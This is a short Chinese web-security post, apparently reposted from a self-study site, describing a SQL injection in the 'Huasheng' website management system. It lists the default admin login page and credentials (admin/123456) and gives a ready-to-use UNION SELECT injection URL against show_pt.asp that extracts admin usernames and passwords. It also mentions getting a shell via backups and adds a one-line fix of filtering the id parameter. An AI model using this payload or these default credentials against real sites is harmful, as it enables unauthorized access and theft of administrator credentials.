默认后台:admin/Login.asp 默认密码:admin 123456
exp: http://www.2 cto .com /show_pt. asp ?id=1568 and 1=2 union select 1,password,3,username,5,6,7,8,9,10,11,12,13,14,15 from admin
注:错误会返回主页。如字段不对,自行构造!拿shell有备份。
修复: 对该页面id参数进行过滤
查看更多关于华盛网站管理系统注入及修复 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13808